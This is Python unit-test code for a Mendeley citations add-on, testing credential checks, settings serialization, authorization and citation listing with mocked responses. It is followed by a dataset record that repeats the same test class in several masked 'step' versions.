tearDown(self): self.id_patcher.stop() self.secret_patcher.stop() @mock.patch('website.addons.mendeley.model.Mendeley.client', new_callable=mock.PropertyMock) def test_check_mendeley_credentials(self, mock_client): mock_client.side_effect = HTTPError(403) assert_false(self.provider.check_credentials(self.node_addon)) mock_client.side_effect = HTTPError(402) with assert_raises(HTTPError): self.provider.check_credentials(self.node_addon) @mock.patch('website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials') def test_serialize_settings_authorizer(self, mock_credentials): #"""dict: a serialized version of user-specific addon settings""" mock_credentials.return_value = True res = self.app.get( self.project.api_url_for('mendeley_get_config'), auth=self.user.auth, ) result = res.json['result'] assert_true(result['nodeHasAuth']) assert_true(result['userHasAuth']) assert_true(result['userIsOwner']) assert_true(result['validCredentials']) assert_equal(result['folder'], {'name': ''}) assert_equal(result['ownerName'], self.user.fullname) assert_true(result['urls']['auth']) assert_true(result['urls']['config']) assert_true(result['urls']['deauthorize']) assert_true(result['urls']['folders']) assert_true(result['urls']['importAuth']) assert_true(result['urls']['settings']) @mock.patch('website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials') def test_serialize_settings_non_authorizer(self, mock_credentials): #"""dict: a serialized version of user-specific addon settings""" mock_credentials.return_value = True non_authorizing_user = AuthUserFactory() self.project.add_contributor(non_authorizing_user, save=True) res = self.app.get( self.project.api_url_for('mendeley_get_config'), auth=non_authorizing_user.auth, ) result = res.json['result'] assert_true(result['nodeHasAuth']) assert_false(result['userHasAuth']) assert_false(result['userIsOwner']) assert_true(result['validCredentials']) assert_equal(result['folder'], {'name': ''}) assert_equal(result['ownerName'], self.user.fullname) assert_true(result['urls']['auth']) assert_true(result['urls']['config']) assert_true(result['urls']['deauthorize']) assert_true(result['urls']['folders']) assert_true(result['urls']['importAuth']) assert_true(result['urls']['settings']) @mock.patch('website.addons.mendeley.provider.MendeleyCitationsProvider.check_credentials') def test_set_auth(self, mock_credentials): mock_credentials.return_value = True res = self.app.put_json( self.project.api_url_for('mendeley_add_user_auth'), { 'external_account_id': self.account._id, }, auth=self.user.auth, ) assert_equal( res.status_code, 200 ) assert_true(res.json['result']['userHasAuth']) assert_equal( self.node_addon.user_settings, self.user_addon ) assert_equal( self.node_addon.external_account, self.account ) def test_remove_user_auth(self): self.node_addon.set_auth(self.account, self.user) res = self.app.delete_json( self.project.api_url_for('mendeley_remove_user_auth'), { 'external_account_id': self.account._id, }, auth=self.user.auth, ) assert_equal( res.status_code, 200 ) self.node_addon.reload() assert_is_none(self.node_addon.user_settings) assert_is_none(self.node_addon.external_account) @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata') def test_set_config_owner(self, mock_metadata): mock_metadata.return_value = MockFolder(name='Fake Folder') # Settings config updates node settings self.node_addon.associated_user_settings = [] self.node_addon.save() res = self.app.put_json( self.project.api_url_for('mendeley_set_config'), { 'external_account_id': self.account._id, 'external_list_id': 'list', }, auth=self.user.auth, ) self.node_addon.reload() assert_equal(self.user_addon, self.node_addon.user_settings) serializer = MendeleySerializer(node_settings=self.node_addon, user_settings=self.user_addon) expected = { 'result': serializer.serialized_node_settings } assert_equal(res.json, expected) @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata') def test_set_config_not_owner(self, mock_metadata): mock_metadata.return_value = MockFolder(name='Fake Folder') user = AuthUserFactory() user.add_addon('mendeley') self.project.add_contributor(user) self.project.save() res = self.app.put_json( self.project.api_url_for('mendeley_set_config'), { 'external_account_id': self.account._id, 'external_list_id': 'list', }, auth=user.auth, ) self.node_addon.reload() assert_equal(self.user_addon, self.node_addon.user_settings) serializer = MendeleySerializer(node_settings=self.node_addon, user_settings=None) expected = { 'result': serializer.serialized_node_settings } assert_equal(res.json, expected) def test_mendeley_widget_view_complete(self): # JSON: everything a widget needs assert_false(self.node_addon.complete) assert_equal(self.node_addon.mendeley_list_id, None) self.node_addon.set_target_folder('ROOT-ID', 'ROOT', auth=Auth(user=self.user)) url = self.project.api_url_for('mendeley_widget') res = self.app.get(url, auth=self.user.auth).json assert_true(res['complete']) assert_equal(res['list_id'], 'ROOT-ID') def test_widget_view_incomplete(self): # JSON: tell the widget when it hasn't been configured assert_false(self.node_addon.complete) assert_equal(self.node_addon.mendeley_list_id, None) url = self.project.api_url_for('mendeley_widget') res = self.app.get(url, auth=self.user.auth).json assert_false(res['complete']) assert_is_none(res['list_id']) @httpretty.activate def test_mendeley_citation_list_root(self): httpretty.register_uri( httpretty.GET, urlparse.urljoin(API_URL, 'folders'), body=mock_responses['folders'], content_type='application/json' ) res = self.app.get( self.project.api_url_for('mendeley_citation_list'), auth=self.user.auth ) root = res.json['contents'][0] assert_equal(root['kind'], 'folder') assert_equal(root['id'], 'ROOT') assert_equal(root['parent_list_id'], '__') @httpretty.activate def test_mendeley_citation_list_non_root(self): httpretty.register_uri( httpretty.GET, urlparse.urljoin(API_URL, 'folders'), body=mock_responses['folders'], content_type='application/json' ) httpretty.register_uri( httpretty.GET, urlparse.urljoin(API_URL, 'documents'), body=mock_responses['documents'], content_type='application/json' ) res = self.app.get( self.project.api_url_for('mendeley_citation_list', mendeley_list_id='ROOT'), auth=self.user.auth ) children = res.json['contents'] assert_equal(len(children), 7) assert_equal(children[0]['kind'], 'folder') assert_equal(children[1]['kind'], 'file') assert_true(children[1].get('csl') is not None) @httpretty.activate def test_mendeley_citation_list_non_linked_or_child_non_authorizer(self): non_authorizing_user = AuthUserFactory() self.project.add_contributor(non_authorizing_user, save=True) self.node_addon.mendeley_list_id = 'e843da05-8818-47c2-8c37-41eebfc4fe3f' self.node_addon.save() httpretty.register_uri( httpretty.GET, urlparse.urljoin(API_URL, 'folders'), body=mock_responses['folders'], content_type='application/json' ) httpretty.register_uri( httpretty.GET, urlparse.urljoin(API_URL, 'documents'), body=mock_responses['documents'], content_type='application/json' ) res = self.app.get( self.project.api_url_for('mendeley_citation_list', mendeley_list_id='ROOT'), auth=non_authorizing_user.auth, expect_errors=True ) assert_equal(res.status_code, 403)
normal
{ "blob_id": "f69351474fb3eb48eeb65eaf1aa46d2f4a390471", "index": 1887, "step-1": "<mask token>\n\n\nclass MendeleyViewsTestCase(OsfTestCase):\n\n def setUp(self):\n super(MendeleyViewsTestCase, self).setUp()\n self.account = MendeleyAccountFactory()\n self.user = AuthUserFactory(external_accounts=[self.account])\n self.account.display_name = self.user.fullname\n self.account.save()\n self.user_addon = MendeleyUserSettingsFactory(owner=self.user,\n external_account=self.account)\n self.project = ProjectFactory(creator=self.user)\n self.node_addon = MendeleyNodeSettingsFactory(owner=self.project)\n self.node_addon.set_auth(external_account=self.account, user=self.user)\n self.provider = MendeleyCitationsProvider()\n self.node = MockNode()\n self.node.addon = self.node_addon\n self.id_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_id')\n self.secret_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_secret')\n self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.id_patcher.start()\n self.secret_patcher.start()\n\n def tearDown(self):\n self.id_patcher.stop()\n self.secret_patcher.stop()\n\n @mock.patch('website.addons.mendeley.model.Mendeley.client',\n new_callable=mock.PropertyMock)\n def test_check_mendeley_credentials(self, mock_client):\n mock_client.side_effect = HTTPError(403)\n assert_false(self.provider.check_credentials(self.node_addon))\n mock_client.side_effect = HTTPError(402)\n with assert_raises(HTTPError):\n self.provider.check_credentials(self.node_addon)\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=self.user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_true(result['userHasAuth'])\n assert_true(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_non_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=non_authorizing_user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_false(result['userHasAuth'])\n assert_false(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.provider.MendeleyCitationsProvider.check_credentials'\n )\n def test_set_auth(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_add_user_auth'), {'external_account_id': self.account\n ._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n assert_true(res.json['result']['userHasAuth'])\n assert_equal(self.node_addon.user_settings, self.user_addon)\n assert_equal(self.node_addon.external_account, self.account)\n\n def test_remove_user_auth(self):\n self.node_addon.set_auth(self.account, self.user)\n res = self.app.delete_json(self.project.api_url_for(\n 'mendeley_remove_user_auth'), {'external_account_id': self.\n account._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n self.node_addon.reload()\n assert_is_none(self.node_addon.user_settings)\n assert_is_none(self.node_addon.external_account)\n <mask token>\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_not_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n user = AuthUserFactory()\n user.add_addon('mendeley')\n self.project.add_contributor(user)\n self.project.save()\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_set_config'), {'external_account_id': self.account.\n _id, 'external_list_id': 'list'}, auth=user.auth)\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon,\n user_settings=None)\n expected = {'result': serializer.serialized_node_settings}\n assert_equal(res.json, expected)\n <mask token>\n <mask token>\n\n @httpretty.activate\n def test_mendeley_citation_list_root(self):\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list'), auth=self.user.auth)\n root = res.json['contents'][0]\n assert_equal(root['kind'], 'folder')\n assert_equal(root['id'], 'ROOT')\n assert_equal(root['parent_list_id'], '__')\n <mask token>\n\n @httpretty.activate\n def test_mendeley_citation_list_non_linked_or_child_non_authorizer(self):\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n self.node_addon.mendeley_list_id = (\n 'e843da05-8818-47c2-8c37-41eebfc4fe3f')\n self.node_addon.save()\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'documents'), body=mock_responses['documents'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list', mendeley_list_id='ROOT'), auth=\n non_authorizing_user.auth, expect_errors=True)\n assert_equal(res.status_code, 403)\n", "step-2": "<mask token>\n\n\nclass MendeleyViewsTestCase(OsfTestCase):\n\n def setUp(self):\n super(MendeleyViewsTestCase, self).setUp()\n self.account = MendeleyAccountFactory()\n self.user = AuthUserFactory(external_accounts=[self.account])\n self.account.display_name = self.user.fullname\n self.account.save()\n self.user_addon = MendeleyUserSettingsFactory(owner=self.user,\n external_account=self.account)\n self.project = ProjectFactory(creator=self.user)\n self.node_addon = MendeleyNodeSettingsFactory(owner=self.project)\n self.node_addon.set_auth(external_account=self.account, user=self.user)\n self.provider = MendeleyCitationsProvider()\n self.node = MockNode()\n self.node.addon = self.node_addon\n self.id_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_id')\n self.secret_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_secret')\n self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.id_patcher.start()\n self.secret_patcher.start()\n\n def tearDown(self):\n self.id_patcher.stop()\n self.secret_patcher.stop()\n\n @mock.patch('website.addons.mendeley.model.Mendeley.client',\n new_callable=mock.PropertyMock)\n def test_check_mendeley_credentials(self, mock_client):\n mock_client.side_effect = HTTPError(403)\n assert_false(self.provider.check_credentials(self.node_addon))\n mock_client.side_effect = HTTPError(402)\n with assert_raises(HTTPError):\n self.provider.check_credentials(self.node_addon)\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=self.user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_true(result['userHasAuth'])\n assert_true(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_non_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=non_authorizing_user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_false(result['userHasAuth'])\n assert_false(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.provider.MendeleyCitationsProvider.check_credentials'\n )\n def test_set_auth(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_add_user_auth'), {'external_account_id': self.account\n ._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n assert_true(res.json['result']['userHasAuth'])\n assert_equal(self.node_addon.user_settings, self.user_addon)\n assert_equal(self.node_addon.external_account, self.account)\n\n def test_remove_user_auth(self):\n self.node_addon.set_auth(self.account, self.user)\n res = self.app.delete_json(self.project.api_url_for(\n 'mendeley_remove_user_auth'), {'external_account_id': self.\n account._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n self.node_addon.reload()\n assert_is_none(self.node_addon.user_settings)\n assert_is_none(self.node_addon.external_account)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n self.node_addon.associated_user_settings = []\n self.node_addon.save()\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_set_config'), {'external_account_id': self.account.\n _id, 'external_list_id': 'list'}, auth=self.user.auth)\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon,\n user_settings=self.user_addon)\n expected = {'result': serializer.serialized_node_settings}\n assert_equal(res.json, expected)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_not_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n user = AuthUserFactory()\n user.add_addon('mendeley')\n self.project.add_contributor(user)\n self.project.save()\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_set_config'), {'external_account_id': self.account.\n _id, 'external_list_id': 'list'}, auth=user.auth)\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon,\n user_settings=None)\n expected = {'result': serializer.serialized_node_settings}\n assert_equal(res.json, expected)\n <mask token>\n\n def test_widget_view_incomplete(self):\n assert_false(self.node_addon.complete)\n assert_equal(self.node_addon.mendeley_list_id, None)\n url = self.project.api_url_for('mendeley_widget')\n res = self.app.get(url, auth=self.user.auth).json\n assert_false(res['complete'])\n assert_is_none(res['list_id'])\n\n @httpretty.activate\n def test_mendeley_citation_list_root(self):\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list'), auth=self.user.auth)\n root = res.json['contents'][0]\n assert_equal(root['kind'], 'folder')\n assert_equal(root['id'], 'ROOT')\n assert_equal(root['parent_list_id'], '__')\n\n @httpretty.activate\n def test_mendeley_citation_list_non_root(self):\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'documents'), body=mock_responses['documents'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list', mendeley_list_id='ROOT'), auth=self.\n user.auth)\n children = res.json['contents']\n assert_equal(len(children), 7)\n assert_equal(children[0]['kind'], 'folder')\n assert_equal(children[1]['kind'], 'file')\n assert_true(children[1].get('csl') is not None)\n\n @httpretty.activate\n def test_mendeley_citation_list_non_linked_or_child_non_authorizer(self):\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n self.node_addon.mendeley_list_id = (\n 'e843da05-8818-47c2-8c37-41eebfc4fe3f')\n self.node_addon.save()\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'documents'), body=mock_responses['documents'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list', mendeley_list_id='ROOT'), auth=\n non_authorizing_user.auth, expect_errors=True)\n assert_equal(res.status_code, 403)\n", "step-3": "<mask token>\n\n\nclass MockFolder(object):\n <mask token>\n\n\nclass MendeleyViewsTestCase(OsfTestCase):\n\n def setUp(self):\n super(MendeleyViewsTestCase, self).setUp()\n self.account = MendeleyAccountFactory()\n self.user = AuthUserFactory(external_accounts=[self.account])\n self.account.display_name = self.user.fullname\n self.account.save()\n self.user_addon = MendeleyUserSettingsFactory(owner=self.user,\n external_account=self.account)\n self.project = ProjectFactory(creator=self.user)\n self.node_addon = MendeleyNodeSettingsFactory(owner=self.project)\n self.node_addon.set_auth(external_account=self.account, user=self.user)\n self.provider = MendeleyCitationsProvider()\n self.node = MockNode()\n self.node.addon = self.node_addon\n self.id_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_id')\n self.secret_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_secret')\n self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.id_patcher.start()\n self.secret_patcher.start()\n\n def tearDown(self):\n self.id_patcher.stop()\n self.secret_patcher.stop()\n\n @mock.patch('website.addons.mendeley.model.Mendeley.client',\n new_callable=mock.PropertyMock)\n def test_check_mendeley_credentials(self, mock_client):\n mock_client.side_effect = HTTPError(403)\n assert_false(self.provider.check_credentials(self.node_addon))\n mock_client.side_effect = HTTPError(402)\n with assert_raises(HTTPError):\n self.provider.check_credentials(self.node_addon)\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=self.user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_true(result['userHasAuth'])\n assert_true(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_non_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=non_authorizing_user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_false(result['userHasAuth'])\n assert_false(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.provider.MendeleyCitationsProvider.check_credentials'\n )\n def test_set_auth(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_add_user_auth'), {'external_account_id': self.account\n ._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n assert_true(res.json['result']['userHasAuth'])\n assert_equal(self.node_addon.user_settings, self.user_addon)\n assert_equal(self.node_addon.external_account, self.account)\n\n def test_remove_user_auth(self):\n self.node_addon.set_auth(self.account, self.user)\n res = self.app.delete_json(self.project.api_url_for(\n 'mendeley_remove_user_auth'), {'external_account_id': self.\n account._id}, auth=self.user.auth)\n assert_equal(res.status_code, 200)\n self.node_addon.reload()\n assert_is_none(self.node_addon.user_settings)\n assert_is_none(self.node_addon.external_account)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n self.node_addon.associated_user_settings = []\n self.node_addon.save()\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_set_config'), {'external_account_id': self.account.\n _id, 'external_list_id': 'list'}, auth=self.user.auth)\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon,\n user_settings=self.user_addon)\n expected = {'result': serializer.serialized_node_settings}\n assert_equal(res.json, expected)\n\n @mock.patch('website.addons.mendeley.model.Mendeley._folder_metadata')\n def test_set_config_not_owner(self, mock_metadata):\n mock_metadata.return_value = MockFolder(name='Fake Folder')\n user = AuthUserFactory()\n user.add_addon('mendeley')\n self.project.add_contributor(user)\n self.project.save()\n res = self.app.put_json(self.project.api_url_for(\n 'mendeley_set_config'), {'external_account_id': self.account.\n _id, 'external_list_id': 'list'}, auth=user.auth)\n self.node_addon.reload()\n assert_equal(self.user_addon, self.node_addon.user_settings)\n serializer = MendeleySerializer(node_settings=self.node_addon,\n user_settings=None)\n expected = {'result': serializer.serialized_node_settings}\n assert_equal(res.json, expected)\n\n def test_mendeley_widget_view_complete(self):\n assert_false(self.node_addon.complete)\n assert_equal(self.node_addon.mendeley_list_id, None)\n self.node_addon.set_target_folder('ROOT-ID', 'ROOT', auth=Auth(user\n =self.user))\n url = self.project.api_url_for('mendeley_widget')\n res = self.app.get(url, auth=self.user.auth).json\n assert_true(res['complete'])\n assert_equal(res['list_id'], 'ROOT-ID')\n\n def test_widget_view_incomplete(self):\n assert_false(self.node_addon.complete)\n assert_equal(self.node_addon.mendeley_list_id, None)\n url = self.project.api_url_for('mendeley_widget')\n res = self.app.get(url, auth=self.user.auth).json\n assert_false(res['complete'])\n assert_is_none(res['list_id'])\n\n @httpretty.activate\n def test_mendeley_citation_list_root(self):\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list'), auth=self.user.auth)\n root = res.json['contents'][0]\n assert_equal(root['kind'], 'folder')\n assert_equal(root['id'], 'ROOT')\n assert_equal(root['parent_list_id'], '__')\n\n @httpretty.activate\n def test_mendeley_citation_list_non_root(self):\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'documents'), body=mock_responses['documents'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list', mendeley_list_id='ROOT'), auth=self.\n user.auth)\n children = res.json['contents']\n assert_equal(len(children), 7)\n assert_equal(children[0]['kind'], 'folder')\n assert_equal(children[1]['kind'], 'file')\n assert_true(children[1].get('csl') is not None)\n\n @httpretty.activate\n def test_mendeley_citation_list_non_linked_or_child_non_authorizer(self):\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n self.node_addon.mendeley_list_id = (\n 'e843da05-8818-47c2-8c37-41eebfc4fe3f')\n self.node_addon.save()\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'folders'), body=mock_responses['folders'], content_type=\n 'application/json')\n httpretty.register_uri(httpretty.GET, urlparse.urljoin(API_URL,\n 'documents'), body=mock_responses['documents'], content_type=\n 'application/json')\n res = self.app.get(self.project.api_url_for(\n 'mendeley_citation_list', mendeley_list_id='ROOT'), auth=\n non_authorizing_user.auth, expect_errors=True)\n assert_equal(res.status_code, 403)\n", "step-4": "<mask token>\n\n\nclass MockNode(object):\n <mask token>\n\n @property\n def is_deleted(self):\n return False\n <mask token>\n\n def get_addon(self, name):\n if name == 'mendeley':\n return self.addon\n return None\n\n\nclass MockFolder(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.iteritems():\n setattr(self, k, v)\n\n\nclass MendeleyViewsTestCase(OsfTestCase):\n\n def setUp(self):\n super(MendeleyViewsTestCase, self).setUp()\n self.account = MendeleyAccountFactory()\n self.user = AuthUserFactory(external_accounts=[self.account])\n self.account.display_name = self.user.fullname\n self.account.save()\n self.user_addon = MendeleyUserSettingsFactory(owner=self.user,\n external_account=self.account)\n self.project = ProjectFactory(creator=self.user)\n self.node_addon = MendeleyNodeSettingsFactory(owner=self.project)\n self.node_addon.set_auth(external_account=self.account, user=self.user)\n self.provider = MendeleyCitationsProvider()\n self.node = MockNode()\n self.node.addon = self.node_addon\n self.id_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_id')\n self.secret_patcher = mock.patch(\n 'website.addons.mendeley.model.Mendeley.client_secret')\n self.id_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.secret_patcher.__get__ = mock.Mock(return_value='1234567890asdf')\n self.id_patcher.start()\n self.secret_patcher.start()\n\n def tearDown(self):\n self.id_patcher.stop()\n self.secret_patcher.stop()\n\n @mock.patch('website.addons.mendeley.model.Mendeley.client',\n new_callable=mock.PropertyMock)\n def test_check_mendeley_credentials(self, mock_client):\n mock_client.side_effect = HTTPError(403)\n assert_false(self.provider.check_credentials(self.node_addon))\n mock_client.side_effect = HTTPError(402)\n with assert_raises(HTTPError):\n self.provider.check_credentials(self.node_addon)\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=self.user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_true(result['userHasAuth'])\n assert_true(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.views.MendeleyCitationsProvider.check_credentials'\n )\n def test_serialize_settings_non_authorizer(self, mock_credentials):\n mock_credentials.return_value = True\n non_authorizing_user = AuthUserFactory()\n self.project.add_contributor(non_authorizing_user, save=True)\n res = self.app.get(self.project.api_url_for('mendeley_get_config'),\n auth=non_authorizing_user.auth)\n result = res.json['result']\n assert_true(result['nodeHasAuth'])\n assert_false(result['userHasAuth'])\n assert_false(result['userIsOwner'])\n assert_true(result['validCredentials'])\n assert_equal(result['folder'], {'name': ''})\n assert_equal(result['ownerName'], self.user.fullname)\n assert_true(result['urls']['auth'])\n assert_true(result['urls']['config'])\n assert_true(result['urls']['deauthorize'])\n assert_true(result['urls']['folders'])\n assert_true(result['urls']['importAuth'])\n assert_true(result['urls']['settings'])\n\n @mock.patch(\n 'website.addons.mendeley.provider.MendeleyCitationsProvider.check_credentials'\n )\n def test_set_auth(self, mock_credentials):\n mock_credentials.return_value = True\n res = self.app.put_json(self.project.api_url_for(\n 